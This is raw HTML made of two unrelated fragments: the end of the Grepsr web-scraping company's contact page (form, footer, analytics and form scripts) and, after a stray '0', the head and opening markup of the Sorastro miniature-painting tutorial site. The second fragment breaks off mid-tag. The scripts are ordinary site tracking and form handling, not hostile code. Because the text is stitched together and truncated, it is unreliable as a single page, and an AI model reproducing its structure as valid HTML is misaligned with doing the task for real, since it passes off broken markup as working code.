class="wpforms-required-label">*</span></label><input type="text" id="wpforms-3834-field_0" class="wpforms-field-large wpforms-field-required" name="wpforms[fields][0]" required></div><div id="wpforms-3834-field_3-container" class="wpforms-field wpforms-field-name wpforms-one-third" data-field-id="3"><label class="wpforms-field-label" for="wpforms-3834-field_3">Company Name</label><input type="text" id="wpforms-3834-field_3" class="wpforms-field-large" name="wpforms[fields][3]" ></div><div id="wpforms-3834-field_1-container" class="wpforms-field wpforms-field-email wpforms-one-third" data-field-id="1"><label class="wpforms-field-label" for="wpforms-3834-field_1">Email Address <span class="wpforms-required-label">*</span></label><input type="email" id="wpforms-3834-field_1" class="wpforms-field-large wpforms-field-required" name="wpforms[fields][1]" required></div><div id="wpforms-3834-field_4-container" class="wpforms-field wpforms-field-name wpforms-one-half wpforms-first" data-field-id="4"><label class="wpforms-field-label" for="wpforms-3834-field_4">Phone Number</label><input type="text" id="wpforms-3834-field_4" class="wpforms-field-large" name="wpforms[fields][4]" ></div><div id="wpforms-3834-field_5-container" class="wpforms-field wpforms-field-select wpforms-one-half" data-field-id="5"><label class="wpforms-field-label" for="wpforms-3834-field_5">Area of Interest</label><select name="wpforms[fields][5]" id="wpforms-3834-field_5" class="wpforms-field-large" ><option value="" class="placeholder" disabled selected='selected'>Select Options</option><option value="Sales Intelligence - B2B Lead Gen &amp; CRM Enrichment Data" >Sales Intelligence - B2B Lead Gen &amp; CRM Enrichment Data</option><option value="Pricing Intelligence - Competitors’ Price Monitoring and Analysis" >Pricing Intelligence - Competitors’ Price Monitoring and Analysis</option><option value="Competitive Intelligence - Competitive Data Collection &amp; Monitoring" >Competitive Intelligence - Competitive Data Collection &amp; Monitoring</option><option value="Market Intelligence - Data Collection for Market Research" >Market Intelligence - Data Collection for Market Research</option><option value="Financial Intelligence - Data Collection for Investment Opportunity" >Financial Intelligence - Data Collection for Investment Opportunity</option><option value="Data Aggregation - Location/News/Jobs or Content Data Aggregation" >Data Aggregation - Location/News/Jobs or Content Data Aggregation</option><option value="Custom Work" >Custom Work</option><option value="Press, Analyst, Investment Queries" >Press, Analyst, Investment Queries</option><option value="Job Opportunity" >Job Opportunity</option><option value="Others" >Others</option></select></div><div id="wpforms-3834-field_2-container" class="wpforms-field wpforms-field-textarea" data-field-id="2"><label class="wpforms-field-label" for="wpforms-3834-field_2">How can we help you? <span class="wpforms-required-label">*</span></label><textarea id="wpforms-3834-field_2" class="wpforms-field-medium wpforms-field-required" name="wpforms[fields][2]" required></textarea></div><div id="wpforms-3834-field_7-container" class="wpforms-field wpforms-field-text hidden-field ip" data-field-id="7"><label class="wpforms-field-label wpforms-label-hide" for="wpforms-3834-field_7">ip</label><input type="text" id="wpforms-3834-field_7" class="wpforms-field-small" name="wpforms[fields][7]" ></div><div id="wpforms-3834-field_8-container" class="wpforms-field wpforms-field-text hidden-field ga_id" data-field-id="8"><label class="wpforms-field-label wpforms-label-hide" for="wpforms-3834-field_8">ga_id</label><input type="text" id="wpforms-3834-field_8" class="wpforms-field-small" name="wpforms[fields][8]" ></div><div id="wpforms-3834-field_9-container" class="wpforms-field wpforms-field-text hidden-field timezone" data-field-id="9"><label class="wpforms-field-label wpforms-label-hide" for="wpforms-3834-field_9">timezone</label><input type="text" id="wpforms-3834-field_9" class="wpforms-field-small" name="wpforms[fields][9]" ></div></div><div class="wpforms-field wpforms-field-hp"><label for="wpforms-field_hp" class="wpforms-field-label">Comment</label><input type="text" name="wpforms[hp]" id="wpforms-field_hp" class="wpforms-field-medium"></div><div class="wpforms-recaptcha-container" ><div class="g-recaptcha" data-sitekey="6LdgJ4gUAAAAAL-YxKnzYHDHpkpoyqRkUwkOynwx"></div><input type="text" name="g-recaptcha-hidden" class="wpforms-recaptcha-hidden" style="position:absolute!important;clip:rect(0,0,0,0)!important;height:1px!important;width:1px!important;border:0!important;overflow:hidden!important;padding:0!important;margin:0!important;" required></div><div class="wpforms-submit-container" ><input type="hidden" name="wpforms[id]" value="3834"><input type="hidden" name="wpforms[author]" value="1"><input type="hidden" name="wpforms[post_id]" value="2895"><button type="submit" name="wpforms[submit]" class="wpforms-submit btn btn-primary" id="wpforms-submit-3834" value="wpforms-submit" data-alt-text="Sending...">Submit</button></div></form></div> </div> </section> <!-- footer start --> <div class="footer"> <div class="container"> <div class="row fot-nav"> <div class="col-sm-15"> <ul class="product-footer text-s"> <strong>Products</strong> <li><a href="https://www.grepsr.com/services" target="_blank"><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-concierge.png"> concierge</a></li> <li><a href="https://www.grepsr.com/chrome" target="_blank"><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-chrome.png"> chrome</a></li> <li><a href="https://www.grepsr.com/realtime" target="_blank"><img src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/imgs/logo-realtime.png"> realtime</a></li> </ul> </div> <div class="col-sm-15"> <div id="nav_menu-4" class="widget"><strong>Support</strong><div class="menu-support-container"><ul id="menu-support" class="menu"><li id="menu-item-114" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-114"><a href="https://www.grepsr.com/faq/">FAQs</a></li> <li id="menu-item-117" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-117"><a href="https://www.grepsr.com/customers/#case-study">Case Studies</a></li> <li id="menu-item-3463" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3463"><a href="https://www.grepsr.com/blog/">Blog</a></li> <li id="menu-item-3464" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3464"><a href="https://www.grepsr.com/contact-us/">Contact Us</a></li> </ul></div></div> </div> <div class="col-sm-15"> <div id="nav_menu-2" class="widget"><strong>About Grepsr</strong><div class="menu-about-grepsr-container"><ul id="menu-about-grepsr" class="menu"><li id="menu-item-42" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-42"><a href="https://www.grepsr.com/team/">Meet The Team</a></li> <li id="menu-item-43" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43"><a href="https://www.grepsr.com/careers/">Careers</a></li> <li id="menu-item-3466" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3466"><a href="https://www.grepsr.com/privacy/">Privacy Policy</a></li> <li id="menu-item-3467" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3467"><a href="https://www.grepsr.com/tos/">Terms of Service</a></li> </ul></div></div> </div> <div class="col-sm-15"> <div id="custom_html-2" class="widget_text widget"><strong>Resources</strong><div class="textwidget custom-html-widget"><ul> <li><a href="https://www.grepsr.com/solutions/create-a-competitive-price-monitoring-blueprint-with-grepsr/">Competitive Price Monitoring</a></li> <li><a href="https://www.grepsr.com/solutions/monitor-map-compliance-with-grepsr/">MAP Compliance Monitoring</a></li> <li><a href="https://www.grepsr.com/solutions/reviews-monitoring-with-grepsr/">Reviews Monitoring</a></li> <li><a href="https://www.grepsr.com/success-stories/web-scraping-manufacturing-industry">Accelerated Network Expansion</a></li> </ul></div></div> </div> <div class="col-sm-15"> <div class="footer-contact"> <div id="text-3" class="widget"> <div class="textwidget"><p><img class="wp-image-3340" src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/uploads/2018/07/logo-blue-300x90.png" alt="" width="129" height="39" style="margin-bottom: 10px;" /></p> <p>Suite 05-B, Bhim Plaza,<br /> Sama Marga, Naxal, Kathmandu,<br /> Bagmati 44600, Nepal</p> <p><a href="mailto:[email protected]">[email protected]</a></p> </div> </div> </div> </div> </div> <div class="c-right"> <strong>&#169;</strong> <strong>2012-2019 Grepsr. </strong> <strong>All rights reserved.</strong> </div> </div> </div> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> <script type="text/javascript" src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/js/masonry.js"></script> <script src="https://maps.googleapis.com/maps/api/js?v=3.exp&sensor=false"></script> <script type="text/javascript" src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/js/typed.js"></script> <script type="text/javascript" src="https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/themes/grepsr3/js/hadies.js"></script> <script src="//cdnjs.cloudflare.com/ajax/libs/wow/1.1.2/wow.min.js"></script> <script> new WOW().init(); </script> <script> function getCookie(cname) { var name = cname + "="; var decodedCookie = decodeURIComponent(document.cookie); var ca = decodedCookie.split(';'); for(var i = 0; i <ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') { c = c.substring(1); } if (c.indexOf(name) == 0) { return c.substring(name.length, c.length); } } return ""; } var offset = 'GMT'+moment().format('Z'); var ga_client_id = getCookie('_ga'); ga_client_id = ga_client_id.split('.') jQuery('.ip input').val('76.119.231.70'); jQuery('.timezone input').val(offset); jQuery('.ga_id input').val(ga_client_id[2]+'.'+ga_client_id[3]); </script> <script> jQuery(document).ready(function () { jQuery.post('https://www.grepsr.com?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) { var s = document.createElement("script"); s.type = "text/javascript"; s.innerHTML = response; jQuery("head").append(s); }); }); </script><link rel='stylesheet' id='wpforms-jquery-timepicker-css' href='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wpforms-lite/assets/css/jquery.timepicker.css?ver=1.11.5' type='text/css' media='all' /> <link rel='stylesheet' id='wpforms-flatpickr-css' href='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wpforms-lite/assets/css/flatpickr.min.css?ver=2.3.4' type='text/css' media='all' /> <link rel='stylesheet' id='wpforms-full-css' href='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wpforms-lite/assets/css/wpforms-full.css?ver=1.5.1' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var countVars = {"disqusShortname":"grepsrtest"}; /* ]]> */ </script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.0.16'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-includes/js/wp-embed.min.js?ver=5.0.3'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wpforms-lite/assets/js/jquery.validate.min.js?ver=1.15.1'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wpforms-lite/assets/js/flatpickr.min.js?ver=2.3.4'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wpforms-lite/assets/js/jquery.timepicker.min.js?ver=1.11.5'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wpforms-lite/assets/js/jquery.inputmask.bundle.min.js?ver=4.0.0-beta.24'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wpforms-lite/assets/js/jquery.payment.min.js?ver=1.5.1'></script> <script type='text/javascript' src='https://dmen8ak1fk5yb.cloudfront.net/grepsr-homepage/wp-content/plugins/wpforms-lite/assets/js/wpforms.js?ver=1.5.1'></script> <script type='text/javascript' src='https://www.google.com/recaptcha/api.js?onload=wpformsRecaptchaLoad&#038;render=explicit&#038;ver=2.0.0'></script> <script type='text/javascript'> var wpformsRecaptchaLoad = function(){jQuery(".g-recaptcha").each(function(index, el){grecaptcha.render(el,{callback:function(){wpformsRecaptchaCallback(el);}},true);});};var wpformsRecaptchaCallback = function(el){jQuery(el).parent().find(".wpforms-recaptcha-hidden").val("1").valid();}; </script> <script type="text/javascript" id="slb_context">/* <![CDATA[ */if ( !!window.jQuery ) {(function($){$(document).ready(function(){if ( !!window.SLB ) { {$.extend(SLB, {"context":["public","user_guest"]});} }})})(jQuery);}/* ]]> */</script> <script type='text/javascript'> /* <![CDATA[ */ var wpforms_settings = {"val_required":"This field is required.","val_url":"Please enter a valid URL.","val_email":"Please enter a valid email address.","val_number":"Please enter a valid number.","val_confirm":"Field values do not match.","val_fileextension":"File type is not allowed.","val_filesize":"File exceeds max size allowed.","val_time12h":"Please enter time in 12-hour AM\/PM format (eg 8:45 AM).","val_time24h":"Please enter time in 24-hour format (eg 22:45).","val_requiredpayment":"Payment is required.","val_creditcard":"Please enter a valid credit card number.","uuid_cookie":"","locale":"en"} /* ]]> */ </script> <div class="modal fade video-chrome" id="video-chrome" tabindex="-1" role="dialog" aria-labelledby="video-chrome"> <div class="modal-dialog modal-lg" role="document"> <div class="modal-content" style="padding: 15px 15px 10px;"> <button type="button" class="btn btn-close-now" data-dismiss="modal">Close</button> <iframe id="ytplayer" type="text/html" width="870" height="489.375" src="https://www.youtube.com/embed/dLx6JTPKpsw?controls=0&fs=0&rel=0&showinfo=0&color=white" frameborder="0" allowfullscreen></iframe> </div> </div> </div> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>SORASTRO&#039;S PAINTING | CREATOR OF MINIATURE PAINTING TUTORIALS</title> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://sorastro.com/xmlrpc.php"> <script type="text/javascript"> WebFontConfig = {"google":{"families":["Gentium+Book+Basic:r,i,b,bi:latin,latin-ext"]},"typekit":{"id":"pjw0mkk"}}; (function() { var wf = document.createElement('script'); wf.src = 'https://sorastro.com/wp-content/mu-plugins/wpcomsh/vendor/automattic/custom-fonts/js/webfont.js'; wf.type = 'text/javascript'; wf.async = 'true'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wf, s); })(); </script><style id="jetpack-custom-fonts-css">.wf-active body{font-family:"Gentium Book Basic",serif}.wf-active h1{font-style:normal;font-weight:400}.wf-active h1, .wf-active h2, .wf-active h3, .wf-active h4, .wf-active h5, .wf-active h6{font-family:"raleway-1","raleway-2",sans-serif;font-style:normal;font-weight:400}@media screen and (min-width: 1160px){.wf-active .entry-content h1, .wf-active .entry-content h2, .wf-active .entry-content h3, .wf-active .entry-content h4, .wf-active .entry-content h5, .wf-active .entry-content h6{font-weight:400;font-style:normal}}@media screen and (min-width: 1160px){.wf-active .entry-content h5, .wf-active .entry-content h6{font-weight:400;font-style:normal}}@media screen and (min-width: 1160px){.wf-active .entry-content h1{font-style:normal;font-weight:400}}@media screen and (min-width: 1160px){.wf-active .entry-content h2{font-style:normal;font-weight:400}}@media screen and (min-width: 1160px){.wf-active .entry-content h3{font-style:normal;font-weight:400}}@media screen and (min-width: 1160px){.wf-active .entry-content h4{font-style:normal;font-weight:400}}@media screen and (min-width: 1160px){.wf-active .entry-content h5{font-style:normal;font-weight:400}}@media screen and (min-width: 1160px){.wf-active .entry-content h6{font-style:normal;font-weight:400}}@media screen and (min-width: 1160px){.wf-active .portfolio .entry-content h5, .wf-active .portfolio .entry-content h6, .wf-active .post-type-jetpack-portfolio.entry-content h5, .wf-active .post-type-jetpack-portfolio.entry-content h6{font-style:normal;font-weight:400}}@media screen and (min-width: 1160px){.wf-active body #main div#jp-relatedposts h3.jp-relatedposts-headline{font-style:normal;font-weight:400}}@media screen and (min-width: 1160px){.wf-active body #main div#jp-relatedposts h3.jp-relatedposts-headline em{font-weight:400;font-style:normal}}@media screen and (min-width: 1160px){.wf-active body #main div#jp-relatedposts div.jp-relatedposts-items-visual h4.jp-relatedposts-post-title{font-style:normal;font-weight:400}}@media screen and (min-width: 1160px){.wf-active .widget_jetpack_display_posts_widget .jetpack-display-remote-posts h4{font-weight:400;font-style:normal}}@media screen and (min-width: 1160px){.wf-active .not-found h1{font-weight:400;font-style:normal}}@media screen and (min-width: 1160px){.wf-active .attachment-body h1{font-weight:400;font-style:normal}}@media screen and (min-width: 1160px){.wf-active .attachment-ex h2{font-weight:400;font-style:normal}}@media screen and (min-width: 1160px){.wf-active .entry-footer-item h2{font-style:normal;font-weight:400}}</style> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="SORASTRO&#039;S PAINTING &raquo; Feed" href="https://sorastro.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="SORASTRO&#039;S PAINTING &raquo; Comments Feed" href="https://sorastro.com/comments/feed/" /> <script> var MP3jPLAYLISTS = []; var MP3jPLAYERS = []; </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/sorastro.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='bindery-style-css' href='https://sorastro.com/wp-content/themes/bindery/style.css?ver=2014-12-15' type='text/css' media='all' /> <link crossorigin="anonymous" rel='stylesheet' id='bindery-webfonts-css' href='https://fonts.googleapis.com/css?family=Quattrocento+Sans%3A400%2C400italic%2C700italic%2C700%7CVesper+Libre%3A700&#038;subset=latin%2Clatin-ext&#038;ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='mp3-jplayer-css' href='https://sorastro.com/wp-content/plugins/mp3-jplayer/css/dark.css?ver=2.7.3' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.3.1/css/jetpack.css' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/jquery.spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/tiled-gallery/tiled-gallery/tiled-gallery.min.js'></script> <script type='text/javascript'> var mejsL10n = {"language":"en","strings":{"mejs.install-flash":"You are using a browser that does not have Flash player enabled or installed. Please turn on your Flash player plugin or download the latest version from https:\/\/get.adobe.com\/flashplayer\/","mejs.fullscreen-off":"Turn off Fullscreen","mejs.fullscreen-on":"Go Fullscreen","mejs.download-video":"Download Video","mejs.fullscreen":"Fullscreen","mejs.time-jump-forward":["Jump forward 1 second","Jump forward %1 seconds"],"mejs.loop":"Toggle Loop","mejs.play":"Play","mejs.pause":"Pause","mejs.close":"Close","mejs.time-slider":"Time Slider","mejs.time-help-text":"Use Left\/Right Arrow keys to advance one second, Up\/Down arrows to advance ten seconds.","mejs.time-skip-back":["Skip back 1 second","Skip back %1 seconds"],"mejs.captions-subtitles":"Captions\/Subtitles","mejs.captions-chapters":"Chapters","mejs.none":"None","mejs.mute-toggle":"Mute Toggle","mejs.volume-help-text":"Use Up\/Down Arrow keys to increase or decrease volume.","mejs.unmute":"Unmute","mejs.mute":"Mute","mejs.volume-slider":"Volume Slider","mejs.video-player":"Video Player","mejs.audio-player":"Audio Player","mejs.ad-skip":"Skip ad","mejs.ad-skip-info":["Skip in 1 second","Skip in %1 seconds"],"mejs.source-chooser":"Source Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/mediaelement-and-player.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/mediaelement/mediaelement-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <link rel='https://api.w.org/' href='https://sorastro.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://sorastro.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://sorastro.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://wp.me/7iGEC' /> <link rel='dns-prefetch' href='//widgets.wp.com'/> <link rel='dns-prefetch' href='//s0.wp.com'/> <link rel='dns-prefetch' href='//0.gravatar.com'/> <link rel='dns-prefetch' href='//1.gravatar.com'/> <link rel='dns-prefetch' href='//2.gravatar.com'/> <link rel='dns-prefetch' href='//jetpack.wordpress.com'/> <link rel='dns-prefetch' href='//s1.wp.com'/> <link rel='dns-prefetch' href='//s2.wp.com'/> <link rel='dns-prefetch' href='//public-api.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//c0.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style><meta name="description" content="CREATOR OF MINIATURE PAINTING TUTORIALS" /> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="SORASTRO&#039;S PAINTING" /> <meta property="og:description" content="CREATOR OF MINIATURE PAINTING TUTORIALS" /> <meta property="og:url" content="https://sorastro.com/" /> <meta property="og:site_name" content="SORASTRO&#039;S PAINTING" /> <meta property="og:image" content="https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?fit=1362%2C1361&amp;ssl=1" /> <meta property="og:image:width" content="1362" /> <meta property="og:image:height" content="1361" /> <meta property="og:locale" content="en_US" /> <!-- End Jetpack Open Graph Tags --> <link rel="icon" href="https://i2.wp.com/sorastro.com/wp-content/uploads/2018/04/cropped-Initials-Avatar-April-2018.jpg?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i2.wp.com/sorastro.com/wp-content/uploads/2018/04/cropped-Initials-Avatar-April-2018.jpg?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i2.wp.com/sorastro.com/wp-content/uploads/2018/04/cropped-Initials-Avatar-April-2018.jpg?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i2.wp.com/sorastro.com/wp-content/uploads/2018/04/cropped-Initials-Avatar-April-2018.jpg?fit=270%2C270&#038;ssl=1" /> </head> <body class="home blog not-singular has-site-title has-site-logo"> <div class="hfeed site" id="page"> <header class="site-header layout-span" id="masthead" role="banner"> <div class="site-nav-toggle"> <a><span class="screen-reader-text">Toggle Menu</span></a> </div> <div class="site-header-wrap"> <div class="site-header-content"> <div class="site-branding"> <a href="https://sorastro.com/" class="site-logo-link" rel="home" itemprop="url"><img width="400" height="400" src="https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?fit=400%2C400&amp;ssl=1" class="site-logo attachment-bindery-logo" alt="" data-size="bindery-logo" itemprop="logo" srcset="https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?w=1362&amp;ssl=1 1362w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?resize=300%2C300&amp;ssl=1 300w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?resize=768%2C767&amp;ssl=1 768w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?resize=1024%2C1024&amp;ssl=1 1024w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?resize=400%2C400&amp;ssl=1 400w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?resize=480%2C480&amp;ssl=1 480w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?resize=750%2C749&amp;ssl=1 750w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?resize=600%2C600&amp;ssl=1 600w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?resize=50%2C50&amp;ssl=1 50w, https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?w=1280&amp;ssl=1 1280w" sizes="(max-width: 400px) 100vw, 400px" data-attachment-id="1735" data-permalink="https://sorastro.com/initials-avatar-april-2018/" data-orig-file="https://i0.wp.com/sorastro.com/wp-content/uploads/2018/04/Initials-Avatar-April-2018.jpg?fit=1362%2C1361&amp;ssl=1" data-orig-size="1362,1361" data-comments-opened="1" 